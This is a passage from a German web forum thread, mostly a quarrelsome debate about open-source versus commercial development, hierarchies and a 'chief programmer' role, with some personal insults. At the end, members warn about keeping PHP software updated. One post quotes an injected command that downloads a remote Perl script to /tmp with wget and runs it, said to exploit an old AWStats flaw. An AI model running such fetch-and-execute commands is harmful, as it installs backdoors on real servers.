                  mir ging es um open source und community im Vergleich zur Wirtschaft (auch da wird gefrickelt, aber die Organisationsform produziert bessere Ergebnisse.)

                  Das hängt davon ab, was du erwartest. Einen Support-Anspruch gibt es bei OS in der Regel nicht. Dennoch werden Fehler bei großen Projekten verdammt schnell behoben, ob das wohl etwas mit der Motivation zu tun hat, die dahintersteckt?

                  Wer etwas umsetzt, hat Recht.

                  Wer erfolgreich umsetzt scheint recht zu haben. Ich weiss aber nicht genau, ob das stimmt. Es ist naemlich nicht nur wichtig, dass es "funzt", sondern dass das bereitgestellte System auch weiterentwicklungsfaehig, wartungsfreundlich und skalierbar ist.

                  Das ist der anzustrebende Idealzustand, allerdings entwickeln sich die besten Lösungen oft aus Provisorien. Man kann die Entwicklung eines Projekts nicht vorhersagen. In diesem Punkt ist ein profitorientiertes Unternehmen zurecht konservativ, man kann im ehrenamtlichen Bereich mehr riskieren.

                  was soll „frickeln“ aussagen?

                  Ich weiss auch nicht was frickeln ist. Ich habe das Wort aufgegriffen, weil es lustig ist und anschienend hier tabuisiert.

                  Nur kurzfristig, denn wir stehen trotz aller Reibereien ein gute Stück weit über heise.

                  Was ich persoenlich mit frickeln meine ist das Zusammenfriemeln (Kodieren) bestimmter nicht so relevanter Funktionalitaeten, also bspw. von UIs. Aber da kann man anderer Meinung sein, kein Problem.   :-)

                  Dann nehme ich dieses Angebot gerne in Anspruch. ;-)

                  Grüße
                  Roland

                2. Hi Ludger,

                  Mobbing und Antipathien moechte ich nicht belegen, beides ist aber typisch im ehrenamtlichen Bereich. (BTW - ich fuehle mich hier relativ oft unnoetig unfreundlich angegangen, oft von dem- oder denselben.)

                  Welchen Beitrag könntest Du leisten, um Deine Position zu verändern?

                  Aber es gibt _den_ Chefentwickler. Ausserdem gibt es eine, ich sage mal politisch (im uebrtragenden Sinn) aehnliche Ausrichtung, die die Leute zusammenhalten laesst.

                  Was bedeutet das? Ich sehe diese "Linie" nicht.

                  Ich bin davon ueberzeugt, dass Hierarchien absolut erforderlich sind.

                  Ganz interessant: Das Schlagwort heißt heute gerade im kommerziellen Bereich "funktionale Ausdifferenzierung", nicht "Erweiterung der Hierarchie. Das führt automatisch zu weniger hierarchischen Strukturen und zu mehr Selbständigkeit und Eigenverantwortlichkeit der Subsysteme. Vielleicht versuchst Du mal, Dich da auf modernere Auffassungen einzulassen.

                  BTW - die Devs sind doch auch hierarchisch aufgestellt, es gibt doch eine Aufgabenverteilung mit Schwerpunkten

                  Funktionale Ausdifferenzierung führt nicht automatisch zum Aufbau von Hierarchien. Gerade im DEV-Bereich hatten wir lange Probleme, weil sich Kollegen schwer getan haben, ohne hierarchische Absicherung selbständig Entscheidungen zu treffen. Inzwischen haben wir uns weiterentwickelt. Jeder entscheidet weitgehend selbst, wann er eine Entscheidung in seinem Bereich selbst treffen kann, oder wann er sie zur Diskussion stellen muss. Es gibt auch die andere Variante, nämlich die Frage, wann man für einen anderen Bereich tätig werden kann, ohne sich mit den dortigen Strukturen näher auseinanderzusetzen.

                  Diese von Orlando als anarchistisch bezeichnete entwickelte Arbeitsteilung ersetzt Hierarchie durch einen erweiterten Kommunikations- und Dokumentationsbedarf, da gibt es bei uns noch kleinere Lücken, aber wir haben bereits einige Mittel/Tools entwickelt, um die Kommunikation zwischen den eigenständig arbeitenden Bereichen zu verbessern.

                  Einige Beispiele:

                  • Der gesamte Bereich "selfaktuell" wird durch ein Versionssystem verwaltet, so dass Änderungen immer nachzuvollziehen sind.
                  • Neben DEV-Forum, Real-Life-Treffen, informeller Kommunikation und den DEV-Chats denken wir über ein Wiki als zusätzliches Informations- und Dokumentationssystem nach.
                  • Durch ein entsprechendes Tool kann man jederzeit Fragen zur Abstimmung stellen.
                  • Durch den Bugtracker haben wir eine zentrale Stelle zur Fehlerbehandlung.
                  • Zur Zeit werden Redaktionsstrukturen für technische Arbeitsbereiche ausgebaut.

                  open source und community im Vergleich zur Wirtschaft (auch da wird gefrickelt, aber die Organisationsform produziert bessere Ergebnisse.)

                  Ich denke, kaum ein Bereich ist stärker ausdifferenziert als der unternehmerischer Tätigkewit vom Kiosk bis zum Weltkonzern. Das lässt sich auch verfolgen, wenn man sich mit Statistiken zu Selbständigen auseinandersetzt, die häufig durch diffuse Ergebnisse gekennzeichnet sind. Um einen korrekten Vergleich zwischen SELFHTML e.V. und einem Unternehmen durchführen zu können, müsste man etwa die Effektivität und den Output eines kleinen IT-Unternehmens oder einer Firma, die technische Dokumentationen erstellt, heranziehen.

                  Die pauschale Gegenüberstellung von Vereinen und Wirtschaft trifft nicht. Es ist zudem wichtig zu wissen, dass der eingetragene Verein durchaus so etwas wie eine Unternehmensform sein kann, die ökonomisch härter kalkuliert und besser organisiert als eine vergleichbares Einzelunternehmen, das formal eine traditionelle Unternehmensform gewählt hat. Es gibt Vereine, die Millionenumsätze fahren.

                  Wer erfolgreich umsetzt scheint recht zu haben. Ich weiss aber nicht genau, ob das stimmt. Es ist naemlich nicht nur wichtig, dass es "funzt", sondern dass das bereitgestellte System auch weiterentwicklungsfaehig, wartungsfreundlich und skalierbar ist.

                  Ja. Das Kriterium ist richtig. Die Frage ist, ob nicht gerade IT-Unternehmen oder IT-Mitarbeiter in Unternehmen Interessen entwickeln, nicht so zu arbeiten. Schau Dir mal manche Unix-Software an, die über die Ärzte-Bildaschirme flimmert, und vor allem so konzipiert ist, dass ein Systemwechsel so aufwändig ist, dass man möglichst nicht wechseln oder skalieren kann. Ich halte das nicht für einen Ausnahmefall. Wenn Du an die IT-Großprojekte der letzten Jahre denkst, liegt der Verdacht nahe, das dort diese Prinzipien gezielt missachtet wurden.

                  Ein großer Vorteil der open source Software ist m.E. der Zwang zur offenen Dokumentation, der einen besonderen Druck aufmacht, hohe Sicherheitsstandards zu setzen.

                  Mich interessiert halt wie im ehrenamtlichen Bereich so kodiert wird.

                  Wenn Du an Linux und Derivate denkst, sitzen da inzwischen organisierte Profis an bestimmten Funktionen, open source kann durchaus ein wirtschaftliches Instrument sein. Dagegen findest Du jede Menge hingefummelter Software aus kommerzieller Quelle, die hinten und vorne nichts taugt. Denk nur an die ganzen Billigprogramme, wie sie in den Kaufhäusern verscherbelt werden.

                  Ich weiss auch nicht was frickeln ist. Ich habe das Wort aufgegriffen, weil es lustig ist und anschienend hier tabuisiert.

                  Ich möchte gerne der Letzte sein,
                  drum führt in meinem Namen die Hunde herein.

                  Das Kriterium, ein Ideologem in einem Diskurszusammenhang einzusetzen, weil es eine Außenseiterposition markiert, bei gleichzeitigem Klagen über Mobbing und Mangel an Anerkennung entwickelt eine eigenartige Position....

                  Viele Grüße
                  Mathias Bigge

                  1. Hi,

                    wie gesagt, ich wollte ausdruecklich nicht den Selfraum kritisieren. Aber wir koennen diesen einfach mal als Beispiel nehmen und die Frage stellen, was passiert, wenn der Chefprogrammierer weg ist. ((Bekanntermassen ist die Monarchie das beste politische System sofern ein faehiger Monarch sein Werk tut. Ernsthafte Probleme gibts dann aber regelmaesig bei der Nachfolge. (Aber vielleicht kann man da zukuenftig mit Klonen was machen, Monarchkloning? Hmm!))

                    Gruss,
                    Ludger

                    1. Moin,

                      Hi,

                      wie gesagt, ich wollte ausdruecklich nicht den Selfraum kritisieren. Aber wir koennen diesen einfach mal als Beispiel nehmen und die Frage stellen, was passiert, wenn der Chefprogrammierer weg ist.

                      Wer ist denn hier der Chefprogrammierer?

                      Viele Grüße

                      Swen Wacker

                      1. Hi,

                        wie gesagt, ich wollte ausdruecklich nicht den Selfraum kritisieren. Aber wir koennen diesen einfach mal als Beispiel nehmen und die Frage stellen, was passiert, wenn der Chefprogrammierer weg ist.

                        Wer ist denn hier der Chefprogrammierer?

                        vielleicht Christian? Vielleicht auch Du? Bleiben wir doch ein wenig abstrakt.

                        Anmerkung: "Chefprogrammierung" ist auch ein IT-Konzept,da gehts nicht um Macht und so

                        Gruss,
                        Ludger

                        1. Moin,

                          wie gesagt, ich wollte ausdruecklich nicht den Selfraum kritisieren. Aber wir koennen diesen einfach mal als Beispiel nehmen und die Frage stellen, was passiert, wenn der Chefprogrammierer weg ist.
                          Wer ist denn hier der Chefprogrammierer?
                          vielleicht Christian? Vielleicht auch Du? Bleiben wir doch ein wenig abstrakt.
                          Anmerkung: "Chefprogrammierung" ist auch ein IT-Konzept,da gehts nicht um Macht und so

                          Den Begriff "Chefprogrammierung" als IT-Konzept kenne ich nicht und er erschließt sich mir auch nicht. Erklärst Du ihn mir bitte.

                          Viele Grüße

                          Swen Wacker

                          1. Hi,

                            Den Begriff "Chefprogrammierung" als IT-Konzept kenne ich nicht und er erschließt sich mir auch nicht. Erklärst Du ihn mir bitte.

                            es gibt bspw. die ganz flache Aufstellung, wo bspw. einfach nur die Rollen Konzipierer, Entwickler, Tester, Dokumentierer und Frosch personell besetzt werden. Dann gehts los. Gibts Fragen und Probleme, die nicht schnell geklaert werden koennen, wird oft sogar ein "Externer" herangezogen, ein Wirtschaftsinformatiker oder Vertriebler beispielsweise, ein Kaufmann halt.

                            Chefprogrammierer (es gibt exakt einen) haben dagegen entweder formal bestimmtes Weisungsrecht oder faktisches. Typischerweise macht der dann auch so Sachen wie managing by walking und greift mal hier mal da aktiv ein. Hat den Vorteil, dass die Abnehmer der Entwicklungsleistungen exakt _einen_ Ansprechpartner haben. (Bei der flachen Aufstellung gibt es oft ein Hin- und Hergeschiebe bei Schuldfragen, zudem kann fachliche Unkenntnis besser mit "sozialer Kompetenz" kompensiert werden.   :-(   )

                            Christian halte ich fuer einen Chefentwickler aufgrund der Faktenlage.

                            Gruss,
                            Ludger

                            1. Hallo Ludger,

                              Christian halte ich fuer einen Chefentwickler aufgrund der Faktenlage.

                              Ich auch. Beide.

                              Grüße
                              Roland

                              1. Hi,

                                Christian halte ich fuer einen Chefentwickler aufgrund der Faktenlage.

                                Ich auch. Beide.

                                der Christian Seiler ist mir bisher durch Anpassungen so genannter Templates aufgefallen.

                                Gruss,
                                Ludger

                              2. Moin,

                                Christian halte ich fuer einen Chefentwickler aufgrund der Faktenlage.

                                Ich auch. Beide.

                                Neulich was Andreras Chefentwickler. Und Dani ist auch immer wieder Chefentwicklerin. Und Thomas sowieso. Soll ich auch mal?

                                Viele Grüße

                                Swen Wacker

                                1. Hallo Swen,

                                  Neulich was Andreras Chefentwickler. Und Dani ist auch immer wieder Chefentwicklerin. Und Thomas sowieso. Soll ich auch mal?

                                  Natürlich, schließlich entwickelst du mindestens unseren Kontostand. Die „Verpeilungen“ waren ferner ganz klar eine Chefentwicklung, also darf ich dir zu diesem Aufstieg herzlich gratulieren. ;-p

                                  Grüße
                                  Roland

                          2. Hallo.

                            Den Begriff "Chefprogrammierung" als IT-Konzept kenne ich nicht und er erschließt sich mir auch nicht. Erklärst Du ihn mir bitte.

                            Dann hast du noch nie deinen Chef "programmiert"?
                            MfG, at

                            1. Moin,

                              Dann hast du noch nie deinen Chef "programmiert"?

                              Über mir ist wer?

                              Viele Grüße

                              Swen Wacker

                              1. Hi,

                                Dann hast du noch nie deinen Chef "programmiert"?
                                Über mir ist wer?

                                Deine Gespielin? ;-)

                                cu,
                                Andreas

                                --
                                Warum nennt sich Andreas hier MudGuard?
                                Schreinerei Waechter
                                Fachfragen per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.
                              2. Hallo.

                                Dann hast du noch nie deinen Chef "programmiert"?

                                Über mir ist wer?

                                Offenbar zumindest niemand, der dir den Unterschied zwischen Perfekt und Präsens erläutert (hat).
                                MfG, at

                                1. Moin,

                                  Dann hast du noch nie deinen Chef "programmiert"?
                                  Über mir ist wer?
                                  Offenbar zumindest niemand, der dir den Unterschied zwischen Perfekt und Präsens erläutert (hat).

                                  Pfff. Kannst Du genau sein. Die grammatisch richtige Antwort klingt nicht so witzig.

                                  Viele Grüße

                                  Swen Wacker

                                  1. Hallo.

                                    Dann hast du noch nie deinen Chef "programmiert"?
                                    Über mir ist wer?
                                    Offenbar zumindest niemand, der dir den Unterschied zwischen Perfekt und Präsens erläutert (hat).
                                    Pfff. Kannst Du genau sein. Die grammatisch richtige Antwort klingt nicht so witzig.

                                    Entschuldige, machmal geht es mit mir durch, wenn jemand meine Pointe kontert. Dann werde ich schon mal spießig, präzise und ungerecht. Umso besser, wenn der andere dann deutlich über meiner Reaktion steht, und bei dir bin ich da ja genau an der richtigen Adresse gelandet.
                                    MfG, at

                                    1. Moin,

                                      Umso besser, wenn der andere dann deutlich über meiner Reaktion steht

                                      Nicht so ganz :-) Ich fühlte mich schon zunächst ziemlich angegiftet und musste erstmal drei, vier Sätze schreiben und wieder löschen bis ich dann den richtigen Ton fand. Dann habe ich mir nämlich gedacht, dass deine Pointe gut ist (sie setzt nämlich da an - Grammatik und nicht etwa auf der Bilder-Ebene - wo niemand den Witz erwartet). Und außerdem will ich nicht immer gleich eingeschnappt sein.

                                      Viele Grüße

                                      Swen Wacker

        2. Moin,

          Wird da die Geschwaetzigkeit bestimmter wertvoller Nutzer augenutzt oder ist der Erfolg etwa "systemimmanent"?

          Der Grund ist einfacher als Du denkst: Deine Vorurteile stimmen nicht.

          Viele Grüße

          Swen Wacker

        3. Mein lieber Ludger,

          die Suche nach den "Schuldigen" ist eine natuerliche Konsequenz ehrenamtlicher Taetigkeit, [...]

          Ich habe langsam aber sicher genug von dir und von deinen vollkommen kontextfremden und aus kaum was anderem, als ständigen Unterstellungen und Angriffen bestehenden Mitteilungen.

          Entweder du unterläßt diese hier, oder du suchst dir eine andere Plattform um deinen Mittelungsdrag zu befriedigen.

          Grüße
          Thomas

          1. Hi,

            die Suche nach den "Schuldigen" ist eine natuerliche Konsequenz ehrenamtlicher Taetigkeit, [...]

            Ich habe langsam aber sicher genug von dir

            die Suche nahc dem "Schuldigen" ist aber ein soziales Konzept und durchaus kritikwuerdig. Weil es in aller Regel nicht zielfuehrend ist z.B..

            Gruss,
            Ludger

          2. Hallo Thomas,

            Entweder du unterläßt diese hier, oder du suchst dir eine andere Plattform um deinen Mittelungsdrag zu befriedigen.

            Möglichkeit 3: wir führen die Wahl zum Spinner des Monats ein ;-)

            Gruß, Andreas

            --
            SELFFORUM - hier werden Sie geholfen,
            auch in Fragen zu richtiges Deutsch
            1. Hi,

              Entweder du unterläßt diese hier, oder du suchst dir eine andere Plattform um deinen Mittelungsdrag zu befriedigen.

              Möglichkeit 3: wir führen die Wahl zum Spinner des Monats ein ;-)

              ich stehe zur Verfuegung.

              Lohnt sich das denn dann auch fuer mich?

              Gruss,
              Ludger

              1. Hallo Lude,

                Möglichkeit 3: wir führen die Wahl zum Spinner des Monats ein ;-)
                Lohnt sich das denn dann auch fuer mich?

                hmm, habe ich jetzt falsch verstanden oder arbeitest du nicht genau auf diesen titel hin? die wahl deiner person zum spinner des monats wäre dann quasi die früchte deiner langjährigen arbeit. gut, nicht? danach brauchen wir noch 3 weiter postings von dir und du stehst dann zur wahl des "spinner des jahres" (spinner des monats werden automatisch nominiert). die wahl findet am darauffolgenden tag statt. bei einer promotion deinerseits darfst du dann gehen, weil ziel erreicht. gut, nicht?

                Grüsse
                Siramon,
                     ja der spinner aus der schweiz

                1. Hi,

                  hmm, habe ich jetzt falsch verstanden oder arbeitest du nicht genau auf diesen titel hin? die wahl deiner person zum spinner des monats wäre dann quasi die früchte deiner langjährigen arbeit. gut, nicht?

                  so magst Du das sehen, ich dagegen sehe in Dir den unverbesserlichen Dumpf. Schreib doch mal, was Du von IT verstehst. Nichts?

                  die wahl findet am darauffolgenden tag statt. bei einer promotion deinerseits darfst du dann gehen, weil ziel erreicht. gut, nicht?

                  Ich gehe mal rein spekulativ davon aus - aber meine reichhaltige Erfahrung mit Querkoepfen hier qualifiziert mich zu Aussagen wie diese - dass Du ein moeglicherweise erfolgreicher Absolvent eines geisteswissenschaftlichen Studiengangs bist, gut! Aber ansonsten solltest Du Dich hier ein wenig zurueckhalten, wegen mangelnder fachlicher Eignung und sozialer Inkompetenz so zu sagen.

                  Gruss,
                  Ludger

                  1. wegen mangelnder fachlicher Eignung und sozialer Inkompetenz so zu sagen.

                    Wenn es danach ginge dürftes du gar nichts dagen. Aus beiden Gründen.

                  2. Hallo Lude,

                    so magst Du das sehen, ich dagegen sehe in Dir den unverbesserlichen Dumpf. Schreib doch mal, was Du von IT verstehst. Nichts?

                    nein.
                    oder vielleich doch...
                    ich würde mich als script-kiddie bezeichnen. übrigens, den begriff script-kiddie werte ich ähnlich wie du den ausdruck frickelsoftware - ich finde ihn quasi nur lustig.

                    Ich gehe mal rein spekulativ davon aus - aber meine reichhaltige Erfahrung mit Querkoepfen hier qualifiziert mich zu Aussagen wie diese - dass Du ein moeglicherweise erfolgreicher Absolvent eines geisteswissenschaftlichen Studiengangs bist, gut! Aber ansonsten solltest Du Dich hier ein wenig zurueckhalten, wegen mangelnder fachlicher Eignung und sozialer Inkompetenz so zu sagen.

                    geisteswissenschaften, ja auch. erfolgreicher abschluss, wir werden sehen.

                    Grüsse
                    Siramon,
                         ja der studi aus zürich

                    1. Hi,

                      Aber ansonsten solltest Du Dich hier ein wenig zurueckhalten, wegen mangelnder fachlicher Eignung und sozialer Inkompetenz so zu sagen.
                      geisteswissenschaften, ja auch. erfolgreicher abschluss, wir werden sehen.

                      tja, dann wirst Du bestimmt Lehrer!?   :-(

                      Gruss,
                      Ludger

                      --
                      "Studi-Gedoens"
                      1. Hallo Lude,

                        Aber ansonsten solltest Du Dich hier ein wenig zurueckhalten, wegen mangelnder fachlicher Eignung und sozialer Inkompetenz so zu sagen.
                        geisteswissenschaften, ja auch. erfolgreicher abschluss, wir werden sehen.

                        erstens... lustiger quote (fehlt da nicht was dazwischen?)

                        tja, dann wirst Du bestimmt Lehrer!?   :-(

                        zweitens... eher nein, wenn, dann professor. oder kennst du lehrer, die sozial-geographische themen behandeln. und zweitens aatens, wie kommst du zu diesem schluss?

                        drittens... liegen mir die sozial-geographischen themen eher nicht. sie knabern sogar am _erfolgreichen_ abschluss meines studiums.

                        viertens... falls du nichts verstanden hast, liegt das wohl an meiner sozialen inkompetenz. und viertens aatens, wie bist du eigentlich zu diesem schluss gekommen?

                        "Studi-Gedoens"

                        und fünftens... hat gedoens was mit frickeln zu tun? frickelaussage?

                        Grüsse
                        Siramon,
                             ja heute doensend

                        1. Hi,

                          tja, dann wirst Du bestimmt Lehrer!?   :-(
                          zweitens... eher nein, wenn, dann professor. oder kennst du lehrer, die sozial-geographische themen behandeln. und zweitens aatens, wie kommst du zu diesem schluss?

                          ich hatte das 'sozial' schon als vermuteten Kompetenzschwerpunkt herausgelesen aus Deinen Postings.

                          BTW - was sind denn "sozial-geographische Themen"? Ist das was fuer Gruene und andere Esoteriker?

                          Gruss,
                          Ludger

                          1. Hallo Lude,

                            ich hatte das 'sozial' schon als vermuteten Kompetenzschwerpunkt herausgelesen aus Deinen Postings.

                            war nicht mein schwerpunkt, wurde aber einer. wobei bei meiner postingfrequenz lassen sich doch nicht wirklich schwerpunkte herauslesen? naja.

                            BTW - was sind denn "sozial-geographische Themen"? [Frickelvorschläge]
                            [Frickelsuche in der Signatur]

                            sozialgeographie, im speziellen viele themen aus der humangeographie

                            Grüsse
                            Siramon,
                                 ja heute mal sozialkiddie

  3. echo $begrüßung;

    nur eine Warnung: haltet eure PHP-Software aktuell!

    Das klingt zunächst vernünftig.

    Hintergrund der Sache: es hat jemand geschafft, auf bastet.occuris.de Code
    über eine solche Software einzuschleusen:

    Doch wie du nun selber erfahren durftest werden die meisten erst durch eigenen Schaden klug.

    • Das System läuft doch.
    • Ich hatte noch nie damit Probleme.

    Diese und ähnliche Vorurteile und Bequemlichkeiten legt manchereiner erst ab, nachdem er das Kind im Brunnen liegen sah. Oder auch dann nicht. Man kann das Kind ja auch wieder rausholen, sagt ihm ein paar tröstende Wort und weiter rennts. Und dass das Hoftor sperrangelweit offen steht ist momentan auch grad aus dem Bewusstsein verdrängt...

    Deine Warnung ist berechtigt, nur wird sie - mal abgesehen vom eingeschränkten Leserkreis hier - viele nur peripher tangieren. Leider.

    echo "$verabschiedung $name";

  4. Hi,

    system("uname -a");
    system("cd /tmp;wget http://http://geocities.yahoo.com.br/netbrdial/bd.pl;cd /tmp;perl bd.pl");

    Sowas war mit der vorletzen Version von AWStats möglich. Also wenn du ads drauf hast, in jedem Fall updaten.